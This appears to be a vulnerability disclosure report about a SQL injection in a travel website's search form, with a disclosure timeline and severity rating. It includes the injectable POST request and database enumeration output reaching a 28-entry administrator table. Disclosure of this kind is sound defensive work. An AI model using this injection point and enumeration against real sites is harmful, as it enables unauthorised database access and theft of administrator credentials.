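2015-12-24: Details reported to the vendor, awaiting vendor handling
2015-12-24: Vendor confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in related fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public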
POST request:
POST /chinese/01_journey/04_search.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/chinese/01_journey/04_search.php
Cookie: __utma=113860241.1082451763.1450776169.1450776169.1450776169.1; __utmb=113860**.**.**.**0776169; __utmc=113860241; __utmz=113860241.1450776169.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1; PHPSESSID=deb8c8aceb9c2281ed6c446eeee30edd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

xstart=2015-12-22&xend=2016-01-22&ta11=1&ta12=4&xhotkey=27
available databases [5]:
[*] gabriel
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
Database: gabriel
[80 tables]
28 back-end administrator accounts are affected
Table: admin_tb
[28 entries]
Couldn't decrypt them, though. What a letdown.
Severity: High
Vulnerability Rank: 17
Confirmed at: 2015-12-24 19:12
Thank you for the report.
None yet